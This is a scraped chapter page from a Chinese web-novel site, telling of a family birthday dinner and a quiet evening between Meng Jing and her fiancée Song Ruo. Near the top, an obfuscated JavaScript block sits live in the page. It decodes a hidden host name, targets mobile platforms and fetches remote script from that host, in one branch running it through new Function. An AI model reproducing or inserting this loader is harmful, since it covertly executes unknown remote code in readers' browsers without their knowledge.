98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(40(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

那天,游泳比赛那天,她那天说得好听,什么我和她是一样的,她说一套做一套!吕清義的胸脯上下起伏着,难道不是她勾引你去拍什么

是我在追求她。孟璟和这个人并不熟。以前对于死缠烂打的人她很不理解,现在轮到她自己,将心比心,她多了一层理解,有时候人会身不由己,比如她追着未婚妻这一路,不也算是屡败屡战,一厢情愿吗。吕清義如果放下了那也就算了,以往那回事她当没有过,既然她又出现,还搞事,并且威胁到小药瓶子的安全,那就不行,先礼后兵江湖有江湖的规矩,有什么事你冲我来,她只是个清清白白的好学生。这次伤的是我,就算了,当我欠你一人情,现在还你了。再有下次

她语意未尽,眼中的阴狠之色却让吕清義不寒而栗,打了个寒战之后,见孟璟要走,吕清義赶忙说慢着。

孟璟扭身回头,等她说下去。

吕清義问你会喜欢她多久?

孟璟想了想,歪头道这什么问题。

吕清義换了种问法你有多喜欢她?

孟璟除了在小药瓶子跟前荤素不忌啥都能说,同别人探讨这种话题,其实还觉得满羞耻的。咳嗽道反正就,这世界上生活的几十亿人里边儿,我最喜欢她呗。

喜欢到,甚至只要在她身边,就欢喜得直冒泡泡,那么多。

宋若尽管抗拒,最终还是到了后花园帮芬姨的忙。她踮起脚,拿竹竿轻轻敲打着隐藏在枝叶中间的金色小花,猛然间有点乡愁。脑海里被穿书后的生活塞得满满的,已经有一段时间没想到张院长。这桂花却提醒了她。张院长做桂花糕也是一绝。孩子们都喜欢她的手艺。芬姨蹲在雪白的绸布旁,将细小的花朵都拣起来,收拾妥当起身,她朝宋若笑若若辛苦,晚点做好了糕,你可得多吃几块。

宋若点了点头,微笑着目送她进了屋。谢琼站在离她不远的地方,这时走了几步踱过来,探手在她鬓间拂了拂。宋若往后退了一步。

谢琼微笑有虫子。

宋若轻轻地啊了一声,摸着刚刚被轻抚过的发间,眼睛瞪得老大,接近石化了。

谢琼微笑是花。

宋若吁出一口气。

经过这个小小的玩笑,她先前那种抗拒和戒备却毁于一旦。两个人好像变成了普通的小伙伴。因此当谢琼提出走一走的建议,她也不好再拒绝。

两个人中间隔着一臂的距离慢慢走着。

大概因为她总不说话,谢琼又先找话题最近我转学了。

宋若心想转到哪儿了,嘴里应道是吗,适应得怎么样。

谢琼摇头,活动太多了。阅读作业有些好高骛远。让读名家的作品,还要写读书报告。

宋若现在真有点大姐姐和十几岁小屁孩说话的感觉了,因此问那最近是读什么作品呢?

谢琼理智与情感,奥斯丁的。

宋若点了点头,没有多说。

谢琼问若若看过么。

宋若想想,摇头。

谢琼依旧没有放弃这个话题,若若觉得自己是理性更多,还是感性?

宋若站住了,脸上有轻微的迷茫,我很理性。顿一顿,但是有时候人的依恋,是不受理智控制的。

比如孟家门前,此时恰恰点亮的夜灯,它照耀下的一切,对她来说是那样熟悉而温暖。从住到这里的第一天起,她就再三告诫过自己,自己不过是这里的过客。可今天回来,亲切的心情却不容否认。

路上又想起嘈杂的机车声,那车亮着灯直冲过来,宋若无语地望着抹香鲸下车来。她摘下头盔,脸上是愤愤然的神色,微微噘着嘴站在那里,朝宋若望着,老婆。

宋若朝她点点头,你回来了。

孟璟将头盔随手扔到后边的车上,还没说话,门前有辆车,是孟卫国和女儿回来了。孟璟于是两手扶着未婚妻的肩,带她去接祖父。路上低声絮叨着傍晚露水最重了,你不知道吗,在外面乱走什么,着凉了怎么办。

见面免不了一番问候,孟卫国一直说孟璟和宋若瘦了。一家人在饭桌上围坐好,久违的热闹让孟卫国很是开心。明天才是他的正式生日,请几个亲朋过来聚聚。今晚只是给他暖寿。大家先站起来碰了一杯,以果汁代酒,祝他福如东海。

三巡过后,孟姗姗笑道孟璟的采访我看了,蛮不错,你安心拍戏,你爷爷有表姐替你陪着。

宋若微微一愣。孟璟听话不对,嘶了一声爷爷要去姑妈家住啊?

孟姗姗摇头笑了笑不啊,我们谢琼过来这里住。

孟璟表姐不用上学了?

谢琼转学了。

孟璟挑挑眉七中?

谢琼默认。

孟璟怎么,原来的学校倒闭了?

孟姗姗将筷子啪地一声拍在桌上,你怎么说话呢。

孟璟望望爷爷,清了清嗓子,朝姑妈一拱手,抱歉,没别的意思。说着给老爷子夹菜,剥了好几个虾,先给祖父,再给未婚妻。

孟姗姗却不肯就此罢休你一天天的不务正业,朝宋若一笑,若若我不是说你啊,你是别人相中请去拍戏的,和孟璟不能比你把爷爷丢在家做孤寡老人,你表姐来替你陪着老人家,自然了,也是她的本分,但你不道谢就算了,怎么还说话阴阳怪气的呢?爸,您给评评理,您说孟璟气人不气人!

孟璟眼角微微泛红,筷子放下,咬着嘴唇不说话。

孟卫国哎哎两声你还说孟璟气人,你自己呢,你爸爸生日,你不说想着家和万事兴,怎么尽给我找事。咱们孟璟去拍电影,那是我叫她去滴,为了我的宝贝孙媳妇若若,我怕她孤单。我们老头子有什么要紧的,我有的是战友嘛,哦你以为我像你们,整天宅家里?孟璟在家我还得操心她,她去了剧组,有导演和若若管着,我省心多了,饭也多吃两口。谢琼来这里念书很好,我也不反对,小事一桩,你就不要借题发挥了嘛。你说你三四十岁的人了,和小孩子计较什么?

孟姗姗声音都拔尖了几度爸!您就是偏袒孟璟!

孟卫国吃饭,吃饭。连一边欲言又止的宋若也被老爷子看在眼内,他给她夹了一筷子小排,来,我们宝贝若若可更瘦得多了,多吃啊。多吃。

这饭吃完,宋若去陪芬姨做桂花糕。芬姨见她总是默默的,悄笑着和她说若若,别往心里去。宋若摇摇头不会。芬姨叹口气每年总要这那吵上那么几回的。我们小鲸鱼也是可怜。宋若抿嘴笑您叫她什么?芬姨自悔失言,装作没有听见,将糕脱模上屉蒸起来。弄好了就睡觉去。

宋若洗完澡在床上躺下。难为芬姨,替她和孟璟都把房间床铺收拾得纤尘不染。被窝里还有些太阳的味道,她很喜欢,将被子盖在鼻子上,有些贪心地闻着。唯一美中不足的是,下午那杯茶不该喝的。尤其是从来不喝茶和咖啡的人,偶尔喝一杯,简直可以失眠到永远。失眠的焦躁是阳光的味道也安抚不了的。她虽然安静地平躺着,脑海里的念头却此起彼伏,比海浪还要汹涌。

她又想起芬姨那句小鲸鱼来。

小鲸鱼今天在车里靠着她睡着,梦里疼得轻声哼哼。她悄然抬手搭着她的背,缓缓移动着手心,寻找受伤的部位,只是轻轻抚摸,梦中的小鲸鱼眉头就蹙得更深了,鼻息也不稳当。衣服往下一带,就看到了肩胛骨上触目惊心的淤青。前面有司机,她到底不好就那样将她的衣服撩起来查看。路上只得装作睡着,给她当靠枕。

楼下传来哐当一声。是在室外。像是空罐子落地的声响。

宋若慢慢爬起来,掀开薄被,拉开窗帘,朝下望了望。

路灯底下坐着个人。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间